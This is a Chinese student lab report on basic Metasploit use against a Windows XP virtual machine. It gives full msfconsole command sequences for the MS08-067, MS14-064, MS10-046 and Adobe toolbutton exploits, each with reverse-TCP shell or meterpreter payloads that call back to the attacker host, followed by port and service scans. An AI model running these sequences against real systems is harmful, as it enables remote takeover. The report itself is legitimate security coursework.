2019-2020-2 20175216 《网络对抗技术》Exp6 MSF基础应用
2019-2020-2 20175216 《网络对抗技术》Exp6 MSF基础应用
目录
实践内容
一个主动攻击实践
ms08_067
-
Windows Xp的IP:
192.168.170.155
kali的IP:192.168.170.142
, XPping一下kali
-
启动
msfconsole
,然后输入search ms08_067
查找该漏洞使用的攻击模块,攻击模块为exploit/windows/smb/ms08_067_netapi
,如下图所示:
- 输入指令
use exploit/windows/smb/ms08_067_netapi
进入攻击模块,使用show payloads
,查看能够使用的payloads
- 使用指令
set payload generic/shell_reverse_tcp
设置payload
为反向tcp连接,使用show options
查看可以设置的参数
- 设置参数
set RHOST 192.168.170.155 //设置靶机IP
set LPORT 5216 //设置攻击机端口
set LHOST 192.168.170.142//设置攻击机IP
exploit
- 回连成功之后输入
ipconfig
查看信息
- 输入
net user
查看Win目前的用户名
一个针对浏览器的攻击
ms14_064
- 启动
msfconsole
,然后输入search ms14_064
查找该漏洞使用的攻击模块,攻击模块为windows/browser/ms14_064_ole_code_execution
,如下图所示:
- 使用
use windows/browser/ms14_064_ole_code_execution
设置模块,使用set payload windows/meterpreter/reverse_tcp
设置payload,使用指令show options
查看要设置的参数
- 设置参数
set LHOST 192.168.170.142
set LPORT 5216
set URIPATH 5216zxy//设置url域名
exploit
- 在Windows Xp浏览器输入
http://192.168.170.142:8080/5216zxy
- 用指令
sessions
查看会话信息
- 通过输入
sessions -i 1
获取第一个会话连接,并输入ipconfig
验证是否为靶机地址,使用dir
查看文件目录
ms10_046
- 启动
msfconsole
,然后输入searchms10_046
查找该漏洞使用的攻击模块,攻击模块为exploit/windows/browser/ms10_046_shortcut_icon_dllloader
,如下图所示:
- 使用
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
设置模块,使用set payload windows/meterpreter/reverse_tcp
设置payload,使用指令show options
查看要设置的参数
- 设置参数
set SRVHOST 192.168.170.142
set LHOST 192.168.170.142
exploit
- 在windows XP的浏览器中访问刚刚设置的服务器IP
http://192.168.170.142
弹出如下窗口
- 同时攻击者会开始监听并与靶机建立连接。
-
输入
sessions
查看有多少主机被反向链接到攻击者和靶机对应的序号。 -
输入
sessions -i 1
控制靶机(-i后面的数即为靶机对应的序号),并输入ipconfig
查看主机IP地址
一个针对客户端的攻击
Adobe
- 启动
msfconsole
,然后输入search adobe
查找该漏洞使用的攻击模块,攻击模块为exploit/windows/fileformat/adobe_toolbutton
,如下图所示:
- 使用
use exploit/windows/fileformat/adobe_toolbutton
设置模块,使用set payload windows/meterpreter/reverse_tcp
设置payload,使用指令show options
查看要设置的参数
- 设置参数
set RHOST 192.168.170.155//设置靶机IP
set LPORT 5216 //设置攻击机端口
set LHOST 192.168.170.142 //设置攻击机IP
exploit
- 在linux中另外打开一个终端,
msfconsole
进入控制台 - 输入
use exploit/multi/handler
使用监听模块,设置payload
- 使用和生成后门程序时相同的payload:
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.170.142
- 端口号也相同:
set LPORT 5216
- 设置完成后,
exploit
开始监听
- 靶机中打开msf.pdf文件,靶机上钩,攻击成功
- kali中发现回连成功
- 输入
ipconfig
成功应用任何一个辅助模块
cert辅助模块(唯一)
cert
的扫描仪模块是一个有用的管理扫描仪,可以覆盖一个子网来检查服务器证书是否过期- 输入
search cert
首先查看辅助模块cert
辅助模块的信息
- 设置参数
use auxiliary/scanner/telnet/telnet_version
set RHOSTS 192.168.170.142/24
set THREADS 50
run
TCP"XMas"端口扫描(唯一)
- 该模块的主要作用是判断端口是开放还是关闭,结果表示端口是开放或者被过滤(屏蔽)的.
- 输入
search xmas
首先查看xmas
辅助模块的信息
- 设置参数
use auxiliary/scanner/portscan/xmas
set RHOST 192.168.170.142
set ports 5216
run
实验总结
实验问题回答
用自己的话解释什么是exploit,payload,encode.
- exploit就是通过漏洞将自己的恶意代码植入目标主机从而达到攻击的目的
- payload是载荷,里面包含了攻击者想要执行的代码
- encode可以对恶意代码进行伪装,使其不被目标主机发现,从而达到攻击的目的。
离实战还缺些什么技术或步骤?
现在做的实验大多都是针对已经淘汰掉的系统进行的攻击,这些系统的版本已经很久没有更新过了,对他们进行攻击会相对容易一些,还有就是咱们既然可以学习这些攻击技术,那些做软件做系统的也能学到,他们已经对自己的软件和系统做了很多的测试,要想真正的去攻击真的挺难的。
实践体会
在做实验的过程中,这次实验让我系统地了解了它的六大模块,msf的功能有点强啊,不过要学的知识还有很多,路漫漫其修远兮,吾将上下而求索。做实验过程中最难过的时候,就在你做了那么多操作,就差最后一步的时候,它却没有攻击成功。
从我们做过的实验来看,有很大一部分攻击都是源于被攻击者的安全意识不够,如果安全意识得到提高,被攻击的概率就会下降。